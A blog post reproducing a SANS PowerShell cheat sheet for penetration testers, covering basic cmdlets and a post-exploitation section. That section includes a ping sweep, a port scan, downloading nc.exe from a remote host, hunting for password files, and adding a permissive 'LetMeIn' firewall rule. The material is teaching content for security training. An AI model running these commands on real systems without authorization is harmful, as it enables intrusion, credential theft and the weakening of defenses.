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SANS Pen Test Cheat Sheet: PowerShell

0 comments Posted by eskoudisFiled under Cheatsheetby Ed Skoudis

PowerShell really is amazing, and comes in handy for all kinds of infosec tasks, from defense to analysis to offense. In my SANS Security 560 course, we cover PowerShell as a post-exploitation language, with all kinds of nifty tips and tricks for using it. When I teach the class, though, I notice that many students are fairly new to PowerShell's awesomeness.

To help people build their PowerShell skills, Phil Smith and I created this PowerShell cheat sheet (with some great input from Tim Medin and Jeff McJunkin too), containing some of the essential items needed to use PowerShell effectively. In essence, this cheat sheet is what I wish I had when I started learning PowerShell. I hope you enjoy it, especially the 5 PowerShell Essentials section!

Download it by clicking this link: PowerShellCheatSheet_v4

5 PowerShell Essentials		
Concept	What's it Do?	A Handy Alias
PS C:\> Get-Help [cmdlet] -examples	Shows help & examples	PS C:\> help [cmdlet] -examples
PS C:\> Get-Command	Shows a list of commands	PS C:\> gcm *[string]*
PS C:\> Get-Member	Shows properties & methods	PS C:\> [cmdlet] gm
PS C:\> ForEach- Object { \$_ }	Takes each item on the pipeline and handles it as \$_	PS C:\> [cmdlet] % { [cmdlet] \$_ }
PS C:\> Select-String	Searches for strings in files or output, like grep	PS C:\> sls -path [file] -pattern [string]

Useful Cmdlets (and aliases)

Get a directory listing (ls, dir, gci): PS C:\> Get-ChildItem Copy a file (cp, copy, cpi): PS C:\> Copy-Item src.txt dst.txt Move a file (mv, move, mi):

PS C: > Move-Item src.txt dst.txt

Find text within a file:

PS C:\> Select-String -path c:\users *.txt -pattern password PS C:\> ls -r c:\users -file | % {Select-String -path \$ -pattern password}

Display file contents (cat, type, gc): PS C:\> Get-Content file.txt

Get present directory (pwd, gl): PS C:\> Get-Location

Get a process listing (ps, qps): PS C:\> Get-Process

Get a service listing:

PS C:\> Get-Service

Formatting output of a command (Format-List): PS C:\> ls | Format-List -property name

Paginating output:

PS C:\> ls -r | Out-Host -paging

Get the SHA1 hash of a file:

PS C:\> Get-FileHash -Algorithm SHA1 file.txt

Exporting output to CSV:

PS C:\> Get-Process | Export-Csv procs.csv

PowerShell for Pen-Tester Post-Exploitation

Conduct a ping sweep:

PS C:\> 1..255 | % {echo "10.10.10.\$ "; ping -n 1 -w 100 10.10.10.\$ | Select-String ttl}

Conduct a port scan:

PS C: > 1..1024 | % {echo ((new-object Net.Sockets.TcpClient).Connect("10.10.10 .10",\$)) "Port \$ is open!"} 2>\$null

Fetch a file via HTTP (wget in PowerShell):

PS C:\> (New-Object

System.Net.WebClient).DownloadFile("http ://10.10.10.10/nc.exe", "nc.exe")

Find all files with a particular name:

PS C:\> Get-ChildItem "C:\Users\" --include *passwords*.txt

Get a listing of all installed Microsoft Hotfixes:

PS C:\> Get-HotFix

Navigate the Windows registry:

PS C:\> cd HKLM:\

PS HKLM:\> 1s

List programs set to start automatically in the registry: PS C:\> Get-ItemProperty HKLM:\SOFTWARE \Microsoft\Windows\CurrentVersion\run

Convert string from ascii to Base64:

PS C:\>

[System.Convert]::ToBase64String([System .Text.Encoding]::UTF8.GetBytes("PS FTW!"))

List and modify the Windows firewall rules:

PS C:\> Get-NetFirewallRule -all PS C:\> New-NetFirewallRule -Action

Allow -DisplayName LetMeIn -RemoteAddress 10.10.10.25



Purpose

The purpose of this cheat sheet is to describe some common options and techniques for use in Microsoft's PowerShell.

PowerShell Overview

PowerShell Background

PowerShell is the successor to command.com. cmd.exe and cscript. Initially released as a separate download, it is now built in to all modern versions of Microsoft Windows. PowerShell syntax takes the form of verb-noun patterns implemented in cmdlets.

Launching PowerShell

PowerShell is accessed by pressing Start -> typing powershell and pressing enter. Some operations require administrative privileges and can be accomplished by launching PowerShell as an elevated session. You can launch an elevated PowerShell by pressing Start -> typing powershell and pressing Shift-CTRL-Enter.

Additionally, PowerShell cmdlets can be called from cmd.exe by typing: powershell -c "<command>".

Have fun PowerShell'ing. •

-Ed.

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